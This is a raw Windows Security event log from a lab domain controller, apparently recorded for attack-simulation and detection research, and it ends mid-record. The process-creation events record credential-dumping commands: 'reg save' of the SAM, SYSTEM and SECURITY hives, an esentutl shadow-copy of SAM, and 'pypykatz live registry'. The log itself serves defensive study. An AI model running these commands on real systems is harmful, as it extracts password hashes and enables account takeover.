03/12/2021 10:48:14 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257891
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		NT AUTHORITY\SYSTEM
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E7

Group:
	Security ID:		BUILTIN\Backup Operators
	Group Name:		Backup Operators
	Group Domain:		Builtin

Process Information:
	Process ID:		0xf08
	Process Name:		C:\Windows\System32\VSSVC.exe
03/12/2021 10:48:14 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257890
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		NT AUTHORITY\SYSTEM
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E7

Group:
	Security ID:		BUILTIN\Administrators
	Group Name:		Administrators
	Group Domain:		Builtin

Process Information:
	Process ID:		0xf08
	Process Name:		C:\Windows\System32\VSSVC.exe
03/12/2021 10:48:14 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257889
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		NT AUTHORITY\SYSTEM
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E7

Group:
	Security ID:		BUILTIN\Backup Operators
	Group Name:		Backup Operators
	Group Domain:		Builtin

Process Information:
	Process ID:		0xf08
	Process Name:		C:\Windows\System32\VSSVC.exe
03/12/2021 10:48:14 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257888
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		NT AUTHORITY\SYSTEM
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E7

Group:
	Security ID:		BUILTIN\Administrators
	Group Name:		Administrators
	Group Domain:		Builtin

Process Information:
	Process ID:		0xf08
	Process Name:		C:\Windows\System32\VSSVC.exe
03/12/2021 10:48:14 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257887
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		NT AUTHORITY\SYSTEM
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E7

Group:
	Security ID:		BUILTIN\Backup Operators
	Group Name:		Backup Operators
	Group Domain:		Builtin

Process Information:
	Process ID:		0xf08
	Process Name:		C:\Windows\System32\VSSVC.exe
03/12/2021 10:48:14 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257886
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		NT AUTHORITY\SYSTEM
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E7

Group:
	Security ID:		BUILTIN\Administrators
	Group Name:		Administrators
	Group Domain:		Builtin

Process Information:
	Process ID:		0xf08
	Process Name:		C:\Windows\System32\VSSVC.exe
03/12/2021 10:48:14 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257885
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Backup Operators
	Group Name:		Backup Operators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:14 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257884
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Administrators
	Group Name:		Administrators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:14 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257883
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		NT AUTHORITY\SYSTEM
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E7

Group:
	Security ID:		BUILTIN\Backup Operators
	Group Name:		Backup Operators
	Group Domain:		Builtin

Process Information:
	Process ID:		0xf08
	Process Name:		C:\Windows\System32\VSSVC.exe
03/12/2021 10:48:14 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257882
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		NT AUTHORITY\SYSTEM
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E7

Group:
	Security ID:		BUILTIN\Administrators
	Group Name:		Administrators
	Group Domain:		Builtin

Process Information:
	Process ID:		0xf08
	Process Name:		C:\Windows\System32\VSSVC.exe
03/12/2021 10:48:14 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=257881
Keywords=Audit Success
Message=A new process has been created.

Creator Subject:
	Security ID:		NT AUTHORITY\SYSTEM
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E7

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0xf08
	New Process Name:	C:\Windows\System32\VSSVC.exe
	Token Elevation Type:	%%1936
	Mandatory Label:		Mandatory Label\System Mandatory Level
	Creator Process ID:	0x350
	Creator Process Name:	C:\Windows\System32\services.exe
	Process Command Line:	C:\Windows\system32\vssvc.exe

Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.

Type 1 is a full token with no privileges removed or groups disabled.  A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.

Type 2 is an elevated token with no privileges removed or groups disabled.  An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator.  An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.

Type 3 is a limited token with administrative privileges removed and administrative groups disabled.  The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
03/12/2021 10:48:14 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=257880
Keywords=Audit Success
Message=Special privileges assigned to new logon.

Subject:
	Security ID:		NT AUTHORITY\SYSTEM
	Account Name:		SYSTEM
	Account Domain:		NT AUTHORITY
	Logon ID:		0x3E7

Privileges:		SeAssignPrimaryTokenPrivilege
			SeTcbPrivilege
			SeSecurityPrivilege
			SeTakeOwnershipPrivilege
			SeLoadDriverPrivilege
			SeBackupPrivilege
			SeRestorePrivilege
			SeDebugPrivilege
			SeAuditPrivilege
			SeSystemEnvironmentPrivilege
			SeImpersonatePrivilege
			SeDelegateSessionUserImpersonatePrivilege
03/12/2021 10:48:14 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=257879
Keywords=Audit Success
Message=An account was successfully logged on.

Subject:
	Security ID:		NT AUTHORITY\SYSTEM
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E7

Logon Information:
	Logon Type:		5
	Restricted Admin Mode:	-
	Virtual Account:		No
	Elevated Token:		Yes

Impersonation Level:		Impersonation

New Logon:
	Security ID:		NT AUTHORITY\SYSTEM
	Account Name:		SYSTEM
	Account Domain:		NT AUTHORITY
	Logon ID:		0x3E7
	Linked Logon ID:		0x0
	Network Account Name:	-
	Network Account Domain:	-
	Logon GUID:		{00000000-0000-0000-0000-000000000000}

Process Information:
	Process ID:		0x350
	Process Name:		C:\Windows\System32\services.exe

Network Information:
	Workstation Name:	-
	Source Network Address:	-
	Source Port:		-

Detailed Authentication Information:
	Logon Process:		Advapi  
	Authentication Package:	Negotiate
	Transited Services:	-
	Package Name (NTLM only):	-
	Key Length:		0

This event is generated when a logon session is created. It is generated on the computer that was accessed.

The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.

The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).

The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.

The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.

The impersonation level field indicates the extent to which a process in the logon session can impersonate.

The authentication information fields provide detailed information about this specific logon request.
	- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
	- Transited services indicate which intermediate services have participated in this logon request.
	- Package name indicates which sub-protocol was used among the NTLM protocols.
	- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
03/12/2021 10:48:14 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=257878
Keywords=Audit Success
Message=A new process has been created.

Creator Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x1200
	New Process Name:	C:\Windows\System32\esentutl.exe
	Token Elevation Type:	%%1936
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0x47c
	Creator Process Name:	C:\Windows\System32\cmd.exe
	Process Command Line:	esentutl.exe  /y /vss C:\Windows/system32/config/SAM /d C:\Users\ADMINI~1\AppData\Local\Temp/SAM 

Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.

Type 1 is a full token with no privileges removed or groups disabled.  A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.

Type 2 is an elevated token with no privileges removed or groups disabled.  An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator.  An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.

Type 3 is a limited token with administrative privileges removed and administrative groups disabled.  The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
03/12/2021 10:48:14 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=257877
Keywords=Audit Success
Message=A new process has been created.

Creator Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x47c
	New Process Name:	C:\Windows\System32\cmd.exe
	Token Elevation Type:	%%1936
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0x13a4
	Creator Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	Process Command Line:	"C:\Windows\system32\cmd.exe" /c "esentutl.exe /y /vss %SystemRoot%/system32/config/SAM /d %temp%/SAM" 

Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.

Type 1 is a full token with no privileges removed or groups disabled.  A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.

Type 2 is an elevated token with no privileges removed or groups disabled.  An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator.  An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.

Type 3 is a limited token with administrative privileges removed and administrative groups disabled.  The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
03/12/2021 10:48:14 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=257876
Keywords=Audit Success
Message=A new process has been created.

Creator Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0xca4
	New Process Name:	C:\Windows\System32\cmd.exe
	Token Elevation Type:	%%1936
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0x13a4
	Creator Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	Process Command Line:	"C:\Windows\system32\cmd.exe" /c "pypykatz live registry" 

Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.

Type 1 is a full token with no privileges removed or groups disabled.  A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.

Type 2 is an elevated token with no privileges removed or groups disabled.  An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator.  An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.

Type 3 is a limited token with administrative privileges removed and administrative groups disabled.  The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
03/12/2021 10:48:14 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=257875
Keywords=Audit Success
Message=A new process has been created.

Creator Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x62c
	New Process Name:	C:\Windows\System32\reg.exe
	Token Elevation Type:	%%1936
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0xf6c
	Creator Process Name:	C:\Windows\System32\cmd.exe
	Process Command Line:	reg  save HKLM\security C:\Users\ADMINI~1\AppData\Local\Temp\security 

Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.

Type 1 is a full token with no privileges removed or groups disabled.  A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.

Type 2 is an elevated token with no privileges removed or groups disabled.  An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator.  An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.

Type 3 is a limited token with administrative privileges removed and administrative groups disabled.  The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
03/12/2021 10:48:14 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=257874
Keywords=Audit Success
Message=A new process has been created.

Creator Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x1258
	New Process Name:	C:\Windows\System32\reg.exe
	Token Elevation Type:	%%1936
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0xf6c
	Creator Process Name:	C:\Windows\System32\cmd.exe
	Process Command Line:	reg  save HKLM\system C:\Users\ADMINI~1\AppData\Local\Temp\system 

Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.

Type 1 is a full token with no privileges removed or groups disabled.  A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.

Type 2 is an elevated token with no privileges removed or groups disabled.  An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator.  An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.

Type 3 is a limited token with administrative privileges removed and administrative groups disabled.  The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
03/12/2021 10:48:14 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=257873
Keywords=Audit Success
Message=A new process has been created.

Creator Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x794
	New Process Name:	C:\Windows\System32\reg.exe
	Token Elevation Type:	%%1936
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0xf6c
	Creator Process Name:	C:\Windows\System32\cmd.exe
	Process Command Line:	reg  save HKLM\sam C:\Users\ADMINI~1\AppData\Local\Temp\sam 

Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.

Type 1 is a full token with no privileges removed or groups disabled.  A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.

Type 2 is an elevated token with no privileges removed or groups disabled.  An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator.  An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.

Type 3 is a limited token with administrative privileges removed and administrative groups disabled.  The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
03/12/2021 10:48:14 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=257872
Keywords=Audit Success
Message=A new process has been created.

Creator Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0xf6c
	New Process Name:	C:\Windows\System32\cmd.exe
	Token Elevation Type:	%%1936
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0x13a4
	Creator Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	Process Command Line:	"C:\Windows\system32\cmd.exe" /c "reg save HKLM\sam %temp%\sam & reg save HKLM\system %temp%\system & reg save HKLM\security %temp%\security" 

Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.

Type 1 is a full token with no privileges removed or groups disabled.  A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.

Type 2 is an elevated token with no privileges removed or groups disabled.  An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator.  An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.

Type 3 is a limited token with administrative privileges removed and administrative groups disabled.  The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
03/12/2021 10:48:15 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257968
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		NT AUTHORITY\SYSTEM
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E7

Group:
	Security ID:		BUILTIN\Backup Operators
	Group Name:		Backup Operators
	Group Domain:		Builtin

Process Information:
	Process ID:		0xf08
	Process Name:		C:\Windows\System32\VSSVC.exe
03/12/2021 10:48:15 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257967
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		NT AUTHORITY\SYSTEM
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E7

Group:
	Security ID:		BUILTIN\Administrators
	Group Name:		Administrators
	Group Domain:		Builtin

Process Information:
	Process ID:		0xf08
	Process Name:		C:\Windows\System32\VSSVC.exe
03/12/2021 10:48:15 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257966
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		NT AUTHORITY\SYSTEM
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E7

Group:
	Security ID:		BUILTIN\Backup Operators
	Group Name:		Backup Operators
	Group Domain:		Builtin

Process Information:
	Process ID:		0xf08
	Process Name:		C:\Windows\System32\VSSVC.exe
03/12/2021 10:48:15 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257965
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		NT AUTHORITY\SYSTEM
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E7

Group:
	Security ID:		BUILTIN\Administrators
	Group Name:		Administrators
	Group Domain:		Builtin

Process Information:
	Process ID:		0xf08
	Process Name:		C:\Windows\System32\VSSVC.exe
03/12/2021 10:48:15 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257964
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Backup Operators
	Group Name:		Backup Operators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:15 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257963
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		NT AUTHORITY\SYSTEM
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E7

Group:
	Security ID:		BUILTIN\Backup Operators
	Group Name:		Backup Operators
	Group Domain:		Builtin

Process Information:
	Process ID:		0xf08
	Process Name:		C:\Windows\System32\VSSVC.exe
03/12/2021 10:48:15 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257962
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Administrators
	Group Name:		Administrators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:15 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257961
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		NT AUTHORITY\SYSTEM
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E7

Group:
	Security ID:		BUILTIN\Administrators
	Group Name:		Administrators
	Group Domain:		Builtin

Process Information:
	Process ID:		0xf08
	Process Name:		C:\Windows\System32\VSSVC.exe
03/12/2021 10:48:15 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257960
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		NT AUTHORITY\SYSTEM
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E7

Group:
	Security ID:		BUILTIN\Backup Operators
	Group Name:		Backup Operators
	Group Domain:		Builtin

Process Information:
	Process ID:		0xf08
	Process Name:		C:\Windows\System32\VSSVC.exe
03/12/2021 10:48:15 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257959
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		NT AUTHORITY\SYSTEM
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E7

Group:
	Security ID:		BUILTIN\Backup Operators
	Group Name:		Backup Operators
	Group Domain:		Builtin

Process Information:
	Process ID:		0xf08
	Process Name:		C:\Windows\System32\VSSVC.exe
03/12/2021 10:48:15 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257958
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		NT AUTHORITY\SYSTEM
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E7

Group:
	Security ID:		BUILTIN\Administrators
	Group Name:		Administrators
	Group Domain:		Builtin

Process Information:
	Process ID:		0xf08
	Process Name:		C:\Windows\System32\VSSVC.exe
03/12/2021 10:48:15 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257957
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		NT AUTHORITY\SYSTEM
	Account Name:		WIN-DC-725$
	Account Domain:		ATTACKRANGE
	Logon ID:		0x3E7

Group:
	Security ID:		BUILTIN\Administrators
	Group Name:		Administrators
	Group Domain:		Builtin

Process Information:
	Process ID:		0xf08
	Process Name:		C:\Windows\System32\VSSVC.exe
03/12/2021 10:48:15 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257956
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Backup Operators
	Group Name:		Backup Operators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:15 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257955
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
	Account Domain:		ATTACKRANGE
	Logon ID:		0x55E621

Group:
	Security ID:		BUILTIN\Administrators
	Group Name:		Administrators
	Group Domain:		Builtin

Process Information:
	Process ID:		0x1200
	Process Name:		C:\Windows\System32\esentutl.exe
03/12/2021 10:48:15 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4799
EventType=0
Type=Information
ComputerName=win-dc-725.attackrange.local
TaskCategory=Security Group Management
OpCode=Info
RecordNumber=257954
Keywords=Audit Success
Message=A security-enabled local group membership was enumerated.

Subject:
	Security ID:		ATTACKRANGE\Administrator
	Account Name:		Administrator
